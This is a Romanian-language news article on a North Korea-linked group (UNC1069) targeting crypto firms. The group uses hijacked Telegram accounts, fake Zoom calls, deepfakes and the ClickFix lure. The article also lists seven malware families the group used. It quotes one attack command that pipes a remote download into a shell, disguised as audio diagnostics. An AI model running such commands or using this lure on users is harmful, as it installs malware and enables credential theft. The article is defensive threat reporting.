O campanie recentă a unui grup de atacatori statali asociat cu Coreea de Nord vizează sectorul criptomonedelor și DeFi prin inginerie socială avansată.

Hackerii folosesc conturi Telegram compromise pentru a iniția contacte aparent legitime, urmate de invitații la meeting-uri Zoom false și recurg la metoda ClickFix pentru a determina victimele să ruleze comenzi malițioase sub pretextul rezolvării unor probleme tehnice.

Ce-i cu ClickFix?

ClickFix este o tehnică de inginerie socială prin care atacatorii conving utilizatorii să execute singuri comenzi malițioase pe propriul dispozitiv, sub pretextul rezolvării unei probleme tehnice.

De regulă, victima este redirecționată către o pagină care afișează un mesaj fals de eroare (de exemplu, o presupusă problemă cu browserul sau cu verificarea CAPTCHA) și primește instrucțiuni clare: să deschidă fereastra „Run” (Win+R), să copieze un cod și să îl execute.

Variante mai noi ale metodei sunt FileFix – când comanda este rulată din bara de adrese a Windows File Explorer, sau versiunea în care utilizatorul este instruit să introducă comenzi JavaScript în web browser. Codul respectiv descarcă sau lansează malware direct din surse controlate de atacatori.

Particularitatea ClickFix este că ocolește filtrele clasice de securitate, deoarece utilizatorul execută voluntar comanda, iar acțiunea nu implică exploit-uri sau fișiere atașate tradițional. Tehnica a fost folosită în campanii recente pentru distribuirea de infostealers, troieni de acces la distanță și alte tipuri de malware.

Meniu cu șapte feluri de malware

În cazul atacatorilor nord coreeni (UNC1069), sub pretextul unor probleme audio în timpul unei întrevederi pe Zoom, aceștia au direcționat victima către o pagină web ce conținea comenzi ClickFix atât pentru Windows cât și pentru macOS.

Specialiștii de la Google Threat Intelligence Group (GTIG) și Mandiant au detaliat într-un raport că acestea descarcau malware prin scripturi mascate ca “diagnostic audio”. De exemplu, pentru macOS au folosit comanda curl -A audio -s [URL] | zsh, amestecată cu comenzi legitime precum system_profiler SPAudioData.

În atacul analizat de Mandiant, gruparea nord coreeană a folosit și deepfake-uri video pentru a imita persoane cunoscute cu funcții executive zona Web3, pentru a mări credibilitatea.

Atacatorii par a fi motivați financiar și au folosit metoda ClickFix în încercarea de a livra șapte familii de malware cu diferite roluri:

• WAVESHAPER – Backdoor scris în C++ care exfiltrează date sistem
• HYPERCALL – Loader scris în Go pentru payload-uri în memorie
• HIDDENCALL – Backdoor scris în Go pentru comenzi remote
• SILENCELIFT – Backdoor minimalist scris în C++ ce trimite informații despre host către serverul de comandă și control (C2)
• DEEPBREATH – Data miner scris în Swift
• SUGARLOADER – Downloader scris în C++ pentru CHROMEPUSH
• CHROMEPUSH – Data miner scris în C++ ce se instalează ca extensie browser

Colecția mare de malware livrată sugerează faptul că atacatorului a vizat victima în mod direct cu scopul de a fura credențiale, informații din browser, și token de sesiune (session tokens) ce oferă acces la un serviciu fără introducerea parolei.

Aceste detalii pot fi folosite atât pentru a fura criptomonede cât și pentru a facilita campanii ulterioare de inginerie socială sau de furt de identitate.

Conform Google, grupul de hackeri UNC1069 este activ cel puțin din 2018 și vizează în general companii din sectorul cryptocurrency și investiții cu scopul de a sustrage capital financiar, care este apoi folosit de guvernul nord coreean pentru a-și finanța agenda.

O bună parte din fondurile furate de atacatorii nord coreeni este folosită pentru sponsorizarea diverselor programe de înarmare ale țării.